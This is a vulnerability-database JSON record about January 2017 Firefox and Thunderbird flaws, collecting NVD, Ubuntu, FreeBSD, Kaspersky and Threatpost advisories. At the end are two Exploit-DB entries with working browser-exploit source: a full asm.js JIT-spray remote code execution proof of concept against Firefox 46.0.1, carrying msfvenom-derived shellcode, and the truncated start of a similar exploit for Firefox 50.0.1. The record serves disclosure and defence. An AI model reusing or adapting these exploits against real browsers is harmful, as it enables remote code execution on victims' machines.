\n[CVE-2017-5387](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5387>)3.3Critical \n[CVE-2017-5388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5388>)7.5Critical \n[CVE-2017-5374](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5374>)9.8Critical", "modified": "2019-03-07T00:00:00", "published": "2017-01-24T00:00:00", "id": "KLA10953", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10953", "title": "\r KLA10953Multiple vulnerabilities in Mozilla Firefox and Mozilla Firefox ESR ", "type": "kaspersky", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2019-07-19T22:32:43", "bulletinFamily": "NVD", "description": "Memory safety bugs were reported in Firefox 50.1 and Firefox ESR 45.6. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.", "modified": "2018-08-02T19:34:00", "id": "CVE-2017-5373", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5373", "published": "2018-06-11T21:29:00", "title": "CVE-2017-5373", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:32:43", "bulletinFamily": "NVD", "description": "Use-after-free while manipulating XSL in XSLT documents. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.", "modified": "2018-08-02T19:37:00", "id": "CVE-2017-5376", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5376", "published": "2018-06-11T21:29:00", "title": "CVE-2017-5376", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-04T12:19:18", "bulletinFamily": "NVD", "description": "WebExtension scripts can use the \"data:\" protocol to affect pages loaded by other web extensions using this protocol, leading to potential data disclosure or privilege escalation in affected extensions. This vulnerability affects Firefox ESR < 45.7 and Firefox < 51.", "modified": "2019-10-03T00:03:00", "id": "CVE-2017-5386", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5386", "published": "2018-06-11T21:29:00", "title": "CVE-2017-5386", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-04T12:19:18", "bulletinFamily": "NVD", "description": "The JSON viewer in the Developer Tools uses insecure methods to create a communication channel for copying and viewing JSON or HTTP headers data, allowing for potential privilege escalation. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.", "modified": "2019-10-03T00:03:00", "id": "CVE-2017-5390", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5390", "published": "2018-06-11T21:29:00", "title": "CVE-2017-5390", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:32:43", "bulletinFamily": "NVD", "description": "JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.", "modified": "2018-08-02T19:35:00", "id": "CVE-2017-5375", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5375", "published": "2018-06-11T21:29:00", "title": "CVE-2017-5375", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:32:44", "bulletinFamily": "NVD", "description": "A use-after-free vulnerability in the Media Decoder when working with media files when some events are fired after the media elements are freed from memory. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.", "modified": "2018-08-02T19:54:00", "id": "CVE-2017-5396", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5396", "published": "2018-06-11T21:29:00", "title": "CVE-2017-5396", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:32:43", "bulletinFamily": "NVD", "description": "Hashed codes of JavaScript objects are shared between pages. This allows for pointer leaks because an object's address can be discovered through hash codes, and also allows for data leakage of an object's content using these hash codes. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.", "modified": "2018-08-02T19:43:00", "id": "CVE-2017-5378", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5378", "published": "2018-06-11T21:29:00", "title": "CVE-2017-5378", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-07-19T22:32:43", "bulletinFamily": "NVD", "description": "A potential use-after-free found through fuzzing during DOM manipulation of SVG content. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.", "modified": "2018-08-02T19:44:00", "id": "CVE-2017-5380", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5380", "published": "2018-06-11T21:29:00", "title": "CVE-2017-5380", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:32:43", "bulletinFamily": "NVD", "description": "URLs containing certain unicode glyphs for alternative hyphens and quotes do not properly trigger punycode display, allowing for domain name spoofing attacks in the location bar. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.", "modified": "2018-08-02T19:44:00", "id": "CVE-2017-5383", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5383", "published": "2018-06-11T21:29:00", "title": "CVE-2017-5383", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "ubuntu": [{"lastseen": "2019-05-29T19:20:41", "bulletinFamily": "unix", "description": "USN-3175-1 fixed vulnerabilities in Firefox. The update caused a regression on systems where the AppArmor profile for Firefox is set to enforce mode. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMultiple memory safety issues were discovered in Firefox. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5373, CVE-2017-5374)\n\nJIT code allocation can allow a bypass of ASLR protections in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5375)\n\nNicolas Gr\u00c3\u00a9goire discovered a use-after-free when manipulating XSL in XSLT documents in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5376)\n\nAtte Kettunen discovered a memory corruption issue in Skia in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5377)\n\nJann Horn discovered that an object\u2019s address could be discovered through hashed codes of JavaScript objects shared between pages. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to obtain sensitive information. (CVE-2017-5378)\n\nA use-after-free was discovered in Web Animations in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5379)\n\nA use-after-free was discovered during DOM manipulation of SVG content in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5380)\n\nJann Horn discovered that the \u201cexport\u201d function in the Certificate Viewer can force local filesystem navigation when the Common Name contains slashes. If a user were tricked in to exporting a specially crafted certificate, an attacker could potentially exploit this to save content with arbitrary filenames in unsafe locations. (CVE-2017-5381)\n\nJerri Rice discovered that the Feed preview for RSS feeds can be used to capture errors and exceptions generated by privileged content. An attacker could potentially exploit this to obtain sensitive information. (CVE-2017-5382)\n\nArmin Razmjou discovered that certain unicode glyphs do not trigger punycode display. An attacker could potentially exploit this to spoof the URL bar contents. (CVE-2017-5383)\n\nPaul Stone and Alex Chapman discovered that the full URL path is exposed to JavaScript functions specified by Proxy Auto-Config (PAC) files. If a user has enabled Web Proxy Auto Detect (WPAD), an attacker could potentially exploit this to obtain sensitive information. (CVE-2017-5384)\n\nMuneaki Nishimura discovered that data sent in multipart channels will ignore the Referrer-Policy response headers. An attacker could potentially exploit this to obtain sensitive information. (CVE-2017-5385)\n\nMuneaki Nishimura discovered that WebExtensions can affect other extensions using the data: protocol. If a user were tricked in to installing a specially crafted addon, an attacker could potentially exploit this to obtain sensitive information or gain additional privileges. (CVE-2017-5386)\n\nMustafa Hasan discovered that the existence of local files can be determined using the <track> element. An attacker could potentially exploit this to obtain sensitive information. (CVE-2017-5387)\n\nCullen Jennings discovered that WebRTC can be used to generate large amounts of UDP traffic. An attacker could potentially exploit this to conduct Distributed Denial-of-Service (DDOS) attacks. (CVE-2017-5388)\n\nKris Maglione discovered that WebExtensions can use the mozAddonManager API by modifying the CSP headers on sites with the appropriate permissions and then using host requests to redirect script loads to a malicious site. If a user were tricked in to installing a specially crafted addon, an attacker could potentially exploit this to install additional addons without user permission. (CVE-2017-5389)\n\nJerri Rice discovered insecure communication methods in the Dev Tools JSON Viewer. An attacker could potentially exploit this to gain additional privileges. (CVE-2017-5390)\n\nJerri Rice discovered that about: pages used by content can load privileged about: pages in iframes. An attacker could potentially exploit this to gain additional privileges, in combination with a content-injection bug in one of those about: pages. (CVE-2017-5391)\n\nStuart Colville discovered that mozAddonManager allows for the installation of extensions from the CDN for addons.mozilla.org, a publicly accessible site. If a user were tricked in to installing a specially crafted addon, an attacker could potentially exploit this, in combination with a cross-site scripting (XSS) attack on Mozilla\u2019s AMO sites, to install additional addons. (CVE-2017-5393)\n\nFilipe Gomes discovered a use-after-free in the media decoder in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5396)", "modified": "2017-02-06T00:00:00", "published": "2017-02-06T00:00:00", "id": "USN-3175-2", "href": "https://usn.ubuntu.com/3175-2/", "title": "Firefox regression", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:22:07", "bulletinFamily": "unix", "description": "Multiple memory safety issues were discovered in Firefox. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5373, CVE-2017-5374)\n\nJIT code allocation can allow a bypass of ASLR protections in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5375)\n\nNicolas Gr\u00c3\u00a9goire discovered a use-after-free when manipulating XSL in XSLT documents in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5376)\n\nAtte Kettunen discovered a memory corruption issue in Skia in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5377)\n\nJann Horn discovered that an object\u2019s address could be discovered through hashed codes of JavaScript objects shared between pages. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to obtain sensitive information. (CVE-2017-5378)\n\nA use-after-free was discovered in Web Animations in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5379)\n\nA use-after-free was discovered during DOM manipulation of SVG content in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5380)\n\nJann Horn discovered that the \u201cexport\u201d function in the Certificate Viewer can force local filesystem navigation when the Common Name contains slashes. If a user were tricked in to exporting a specially crafted certificate, an attacker could potentially exploit this to save content with arbitrary filenames in unsafe locations. (CVE-2017-5381)\n\nJerri Rice discovered that the Feed preview for RSS feeds can be used to capture errors and exceptions generated by privileged content. An attacker could potentially exploit this to obtain sensitive information. (CVE-2017-5382)\n\nArmin Razmjou discovered that certain unicode glyphs do not trigger punycode display. An attacker could potentially exploit this to spoof the URL bar contents. (CVE-2017-5383)\n\nPaul Stone and Alex Chapman discovered that the full URL path is exposed to JavaScript functions specified by Proxy Auto-Config (PAC) files. If a user has enabled Web Proxy Auto Detect (WPAD), an attacker could potentially exploit this to obtain sensitive information. (CVE-2017-5384)\n\nMuneaki Nishimura discovered that data sent in multipart channels will ignore the Referrer-Policy response headers. An attacker could potentially exploit this to obtain sensitive information. (CVE-2017-5385)\n\nMuneaki Nishimura discovered that WebExtensions can affect other extensions using the data: protocol. If a user were tricked in to installing a specially crafted addon, an attacker could potentially exploit this to obtain sensitive information or gain additional privileges. (CVE-2017-5386)\n\nMustafa Hasan discovered that the existence of local files can be determined using the <track> element. An attacker could potentially exploit this to obtain sensitive information. (CVE-2017-5387)\n\nCullen Jennings discovered that WebRTC can be used to generate large amounts of UDP traffic. An attacker could potentially exploit this to conduct Distributed Denial-of-Service (DDOS) attacks. (CVE-2017-5388)\n\nKris Maglione discovered that WebExtensions can use the mozAddonManager API by modifying the CSP headers on sites with the appropriate permissions and then using host requests to redirect script loads to a malicious site. If a user were tricked in to installing a specially crafted addon, an attacker could potentially exploit this to install additional addons without user permission. (CVE-2017-5389)\n\nJerri Rice discovered insecure communication methods in the Dev Tools JSON Viewer. An attacker could potentially exploit this to gain additional privileges. (CVE-2017-5390)\n\nJerri Rice discovered that about: pages used by content can load privileged about: pages in iframes. An attacker could potentially exploit this to gain additional privileges, in combination with a content-injection bug in one of those about: pages. (CVE-2017-5391)\n\nStuart Colville discovered that mozAddonManager allows for the installation of extensions from the CDN for addons.mozilla.org, a publicly accessible site. If a user were tricked in to installing a specially crafted addon, an attacker could potentially exploit this, in combination with a cross-site scripting (XSS) attack on Mozilla\u2019s AMO sites, to install additional addons. (CVE-2017-5393)\n\nFilipe Gomes discovered a use-after-free in the media decoder in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5396)", "modified": "2017-01-27T00:00:00", "published": "2017-01-27T00:00:00", "id": "USN-3175-1", "href": "https://usn.ubuntu.com/3175-1/", "title": "Firefox vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:21:19", "bulletinFamily": "unix", "description": "Multiple memory safety issues were discovered in Thunderbird. If a user were tricked in to opening a specially crafted message, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code. (CVE-2016-9893, CVE-2017-5373)\n\nAndrew Krasichkov discovered that event handlers on <marquee> elements were executed despite a Content Security Policy (CSP) that disallowed inline JavaScript. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could potentially exploit this to conduct cross-site scripting (XSS) attacks. (CVE-2016-9895)\n\nA memory corruption issue was discovered in WebGL in some circumstances. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2016-9897)\n\nA use-after-free was discovered when manipulating DOM subtrees in the Editor. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2016-9898)\n\nA use-after-free was discovered when manipulating DOM events and audio elements. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2016-9899)\n\nIt was discovered that external resources that should be blocked when loading SVG images can bypass security restrictions using data: URLs. An attacker could potentially exploit this to obtain sensitive information. (CVE-2016-9900)\n\nJann Horn discovered that JavaScript Map/Set were vulnerable to timing attacks. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could potentially exploit this to obtain sensitive information across domains. (CVE-2016-9904)\n\nA crash was discovered in EnumerateSubDocuments while adding or removing sub-documents. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could potentially exploit this to execute arbitrary code. (CVE-2016-9905)\n\nJIT code allocation can allow a bypass of ASLR protections in some circumstances. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5375)\n\nNicolas Gr\u00c3\u00a9goire discovered a use-after-free when manipulating XSL in XSLT documents in some circumstances. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5376)\n\nJann Horn discovered that an object\u2019s address could be discovered through hashed codes of JavaScript objects shared between pages. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could potentially exploit this to obtain sensitive information. (CVE-2017-5378)\n\nA use-after-free was discovered during DOM manipulation of SVG content in some circumstances. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5380)\n\nArmin Razmjou discovered that certain unicode glyphs do not trigger punycode display. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could potentially exploit this to spoof the URL bar contents. (CVE-2017-5383)\n\nJerri Rice discovered insecure communication methods in the Dev Tools JSON Viewer. An attacker could potentially exploit this to gain additional privileges. (CVE-2017-5390)\n\nFilipe Gomes discovered a use-after-free in the media decoder in some circumstances. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2017-5396)", "modified": "2017-01-28T00:00:00", "published": "2017-01-28T00:00:00", "id": "USN-3165-1", "href": "https://usn.ubuntu.com/3165-1/", "title": "Thunderbird vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:11", "bulletinFamily": "info", "description": "Mozilla Foundation took steps with the release of Firefox 51 on Tuesday to communicate more clearly to users when they land on a HTTP website collecting personal information such as passwords that the site may not be secure.\n\nGoing forward, Firefox will display a gray lock icon with a red strikethrough in the address bar. Should the user click on the lock, a dialog box will pop up with text indicating the connection is not secure. Eventually, Mozilla said, this will be the experience for all HTTP pages.\n\n\u201cTo continue to promote the use of HTTPS and properly convey the risks to users, Firefox will eventually display the struck-through lock icon for all pages that don\u2019t use HTTPS, to make clear that they are not secure,\u201d a [post](<https://blog.mozilla.org/security/2017/01/20/communicating-the-dangers-of-non-secure-http/>) to the Mozilla security blog said. \u201cAs our plans evolve, we will continue to post updates but our hope is that all developers are encouraged by these changes to take the necessary steps to protect users of the Web through HTTPS.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/01/06230933/Threatpost_HTTP_Warning.png>)\n\nMozilla\u2019s move follows similar efforts by Google with its Chrome browser. Late last year, [Google said](<https://threatpost.com/chrome-to-label-some-http-sites-not-secure-in-2017/120452/>) starting this month, Chrome users who navigate to some HTTP sites will be notified they\u2019re on a site that isn\u2019t secure.\n\nOn Tuesday, Mozilla also patched several critical security vulnerabilities. Topping the[ list of critical vulnerabilities](<https://www.mozilla.org/en-US/security/advisories/mfsa2017-01/#CVE-2017-5375>) is one described as a \u201cexcessive JIT code allocation allowing the bypass of ASLR and DEP.\u201d A JIT (just in time) code is a default processes that handles how Java request are made, allowing for compiled byte code to run directly versus taking an additional step of interpreting the code and then running it. The ASLR (address space layout randomization) guards against buffer-overflow attacks and DEP (data execution prevention) protects operating systems from virus attacks launched from Window\u2019s system memory locations.\n\n\u201cJIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks,\u201d according to the security advisory. The vulnerability (CVE-2017-5375) impacts only Firefox 51.\n\nOther critical vulnerabilities include a use-after-free flaw (CVE-2017-5376) related to manipulating XSL in XSLT documents. A second critical memory corruption flaw (CVE-2017-5377) was found impacting the open source 2D graphics library called Skia.\n\nOf the [advisories rated high](<https://www.mozilla.org/en-US/security/advisories/mfsa2017-01/#CVE-2017-5375>) three were use-after-free vulnerabilities related to web animations (CVE-2017-5379), DOM manipulation of SVG content (CVE-2017-5380) and a bug related to the Firefox Media Decoder (CVE-2017-5396).\n\nSeveral critical vulnerabilities were also found in Mozilla\u2019s Extended Support Release (ESR) version of the Firefox browser. Firefox ESR is a custom version of the Mozilla Firefox browser specifically designed for the special browser requirements relied upon by schools, government agencies and businesses that maybe leery about forced browser updates that could disrupt line-of-business browser-based applications.\n\nOne of those [Firefox ESR critical security alerts](<https://www.mozilla.org/en-US/security/advisories/mfsa2017-02/>) (CVE-2017-5374) was a memory safety bug that with enough effort could be exploited to run arbitrary code, according to the advisory. Another critical memory safety bug was found in Firefox and Firefox ESR 45.7 that also could be exploited to run arbitrary code. Both Firefox ERS vulnerabilities were patched.\n\nFirefox 51 browser also became [the first of the major browsers to display a warning](<https://threatpost.com/sha-1-end-times-have-arrived/123061/>) to users who run into a site that doesn\u2019t support TLS certificates signed by the SHA-2 hashing algorithm. According to Mozilla, SHA-1 warnings start this week for beta Firefox users and will roll out to all other users sometime after that. The move is meant to protect users from [collision attacks](<https://threatpost.com/practical-sha-1-collision-months-not-years-away/114979/>), where two or more inputs generate the same hash value.\n", "modified": "2017-02-04T14:39:48", "published": "2017-01-25T14:30:37", "id": "THREATPOST:F2ADBC39AC760D624DF2B40B8E80BCC2", "href": "https://threatpost.com/firefox-51-begins-warning-users-of-insecure-http-connections/123331/", "type": "threatpost", "title": "Firefox 51 Begins Warning Users of Insecure HTTP Connections", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:22", "bulletinFamily": "unix", "description": "\nMozilla Foundation reports:\n\nPlease reference CVE/URL list for details\n\n", "modified": "2017-01-24T00:00:00", "published": "2017-01-24T00:00:00", "id": "E60169C4-AA86-46B0-8AE2-0D81F683DF09", "href": "https://vuxml.freebsd.org/freebsd/e60169c4-aa86-46b0-8ae2-0d81f683df09.html", "title": "mozilla -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2018-05-24T14:07:57", "bulletinFamily": "exploit", "description": "Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution. CVE-2016-2819,CVE-2017-5375. Remote exploit for Windows platform", "modified": "2018-03-16T00:00:00", "published": "2018-03-16T00:00:00", "id": "EDB-ID:44293", "href": "https://www.exploit-db.com/exploits/44293/", "type": "exploitdb", "title": "Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution", "sourceData": "<!DOCTYPE HTML>\r\n\r\n<!--\r\n\r\n FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)\r\n *PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819)\r\n ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018\r\n\r\n Tested on:\r\n Firefox 46.0.1 32-bit - Windows 10 1709\r\n https://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe\r\n\r\n Howto:\r\n 1) serve PoC over network and open it in Firefox 46.0.1 32-bit\r\n 2) A successfull exploit attempt should pop calc.exe\r\n\r\n Mozilla Bug Report:\r\n https://bugzilla.mozilla.org/show_bug.cgi?id=1270381\r\n\r\n\r\n Writeup: \r\n https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/\r\n\r\n\r\n - For research purposes only -\r\n \r\n (C) Rh0\r\n\r\n Mar. 13, 2018\r\n\r\n-->\r\n\r\n<title>CVE-2016-2819 and ASM.JS JIT-Spray</title>\r\n<head>\r\n<meta charset=UTF-8 />\r\n<script>\r\n\"use strict\"\r\n\r\nvar Exploit = function(){\r\n this.asmjs = new Asmjs()\r\n this.heap = new Heap()\r\n}\r\n\r\nExploit.prototype.go = function(){\r\n /* target address of fake node object */\r\n var node_target_addr = 0x5a500000 \r\n\r\n /* target address of asm.js float pool payload*/\r\n var target_eip = 0x20200b58\r\n\r\n /* spray asm.js float constant pools */\r\n this.asmjs.spray_float_payload(0x1000)\r\n\r\n /* spray fake Node objects */\r\n this.heap.spray(node_target_addr, target_eip)\r\n\r\n /* go! */\r\n this.trigger_vuln(node_target_addr)\r\n};\r\n\r\n\r\nExploit.prototype.trigger_vuln = function(node_ptr){\r\n document.body.innerHTML = '<table><svg><div id=\"BBBB\">'\r\n this.heap.gc()\r\n var a = new Array() \r\n for (var i=0; i < 0x10100; i++){\r\n /* array element (Node object ptr) control with integer underflow */\r\n a[i] = new Uint32Array(0x100/4)\r\n for (var j=0; j<0x100/4; j++)\r\n a[i][j] = node_ptr \r\n }\r\n\r\n /* original crashing testcase\r\n document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}</style>'\r\n */\r\n\r\n /* easier to exploit codepath */\r\n document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}<DD>'\r\n\r\n window.location.reload()\r\n};\r\n\r\n\r\nvar Asmjs = function(){};\r\n\r\nAsmjs.prototype.asm_js_module = function(stdlib, ffi){\r\n \"use asm\"\r\n var foo = ffi.foo\r\n function payload(){\r\n var val = 0.0\r\n /* Fx 46.0.1 float constant pool of size 0xc0 is at 0xXXXX0b58*/\r\n val = +foo(\r\n // $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py\r\n -1.587865768352248e-263,\r\n -8.692422460804815e-255,\r\n 7.529882109376901e-114,\r\n 2.0120602207293977e-16,\r\n 3.7204662687249914e-242,\r\n 4.351158092040946e+89,\r\n 2.284741716118451e+270,\r\n 7.620699014501263e-153,\r\n 5.996021286047645e+44,\r\n -5.981935902612295e-92,\r\n 6.23540918304361e+259,\r\n 1.9227873281657598e+256,\r\n 2.0672493951546363e+187,\r\n -6.971032919585734e+91,\r\n 5.651413300798281e-134,\r\n -1.9040061366251406e+305,\r\n -1.2687640718807038e-241,\r\n 9.697849844423e-310,\r\n -2.0571400761625145e+306,\r\n -1.1777948610587587e-123,\r\n 2.708909852013898e+289,\r\n 3.591750823735296e+37,\r\n -1.7960516725035723e+106,\r\n 6.326776523166028e+180\r\n )\r\n return +val;\r\n }\r\n return payload\r\n};\r\n\r\nAsmjs.prototype.spray_float_payload = function(regions){\r\n this.modules = new Array(regions).fill(null).map(\r\n region => this.asm_js_module(window, {foo: () => 0})\r\n )\r\n};\r\n\r\nvar Heap = function(target_addr, eip){\r\n this.node_heap = []\r\n};\r\n\r\n\r\nHeap.prototype.spray = function(node_target_addr, target_eip){\r\n var junk = 0x13371337\r\n var current_address = 0x20000000\r\n var block_size = 0x1000000\r\n while(current_address < node_target_addr){\r\n var fake_objects = new Uint32Array(block_size/4 - 0x100)\r\n for (var offset = 0; offset < block_size; offset += 0x100000){\r\n /* target Node object needed to control EIP */\r\n fake_objects[offset/4 + 0x00/4] = 0x29 \r\n fake_objects[offset/4 + 0x0c/4] = 3\r\n fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18\r\n fake_objects[offset/4 + 0x18/4] = 1\r\n fake_objects[offset/4 + 0x1c/4] = junk\r\n fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24\r\n fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28\r\n fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c\r\n fake_objects[offset/4 + 0x2c/4] = target_eip \r\n }\r\n this.node_heap.push(fake_objects)\r\n current_address += block_size\r\n }\r\n};\r\n\r\nHeap.prototype.gc = function(){\r\n for (var i=0; i<=10; i++)\r\n var x = new ArrayBuffer(0x1000000)\r\n};\r\n\r\n</script>\r\n<head>\r\n<body onload='exploit = new Exploit(); exploit.go()' />", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44293/"}, {"lastseen": "2017-07-14T19:41:45", "bulletinFamily": "exploit", "description": "Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution. CVE-2016-9079,CVE-2017-5375. Remote exploit for Windows platform", "modified": "2017-07-14T00:00:00", "published": "2017-07-14T00:00:00", "id": "EDB-ID:42327", "href": "https://www.exploit-db.com/exploits/42327/", "type": "exploitdb", "title": "Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution", "sourceData": "<!DOCTYPE HTML>\r\n\r\n<!--\r\n\r\n FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)\r\n PoC Exploit against Firefox 50.0.1 (CVE-2016-9079 - Tor Browser 0day)\r\n\r\n Tested on:\r\n\r\n Release 50.0.1 32-bit - Windows 8.1 / Windows 10\r\n https://ftp.mozilla.org/pub/firefox/releases/50.0.1/win32/en-US/Firefox%20Setup%2050.0.1.exe\r\n\r\n Howto:\r\n\r\n 1) serve PoC over network and open it in Firefox 50.0.1 32-bit\r\n 2) if you don't see cmd.exe, open processexplorer and verify that cmd.exe was spawned by firefox.exe\r\n\r\n A successfull exploit attempt should pop cmd.exe\r\n\r\n Writeup: https://rh0dev.github.io/blog/2017/the-return-of-the-jit/\r\n \r\n (C) Rh0\r\n\r\n Jul. 13, 2017\r\n\r\n-->\r\n\r\n<script async>\r\nfunction asm_js_module(){\r\n \"use asm\";\r\n /* huge jitted nop sled */\r\n function payload_code(){\r\n var val = 